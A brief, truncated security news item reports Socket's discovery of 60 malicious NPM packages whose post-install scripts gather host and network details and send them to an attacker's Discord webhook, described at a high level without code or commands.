Dozens of malicious packages on NPM collect host and network data

60 packages have been discovered in the NPM index that attempt to collect sensitive host and network data and send it to a Discord webhook controlled by the threat actor. According to Socket’s Threat Research team, the packages were uploaded to the NPM repository starting May 12 from three publisher accounts. Each of the malicious packages contains a post-install script that automatically executes during ‘npm install’ and collects the following information: Hostname Internal IP address User home directory Current working directory Username System DNS servers The script checks for hostnames related to cloud providers, reverse DNS strings, in an attempt to determine if it is running in an analysis environment. Socket did not observe the delivery of second-stage payloads, privilege escalation, or any persistent mechanisms. However, given the type of data collected, the danger of targeted network attacks is significant. Packages still available on NPM The researchers reported t ... Read full article.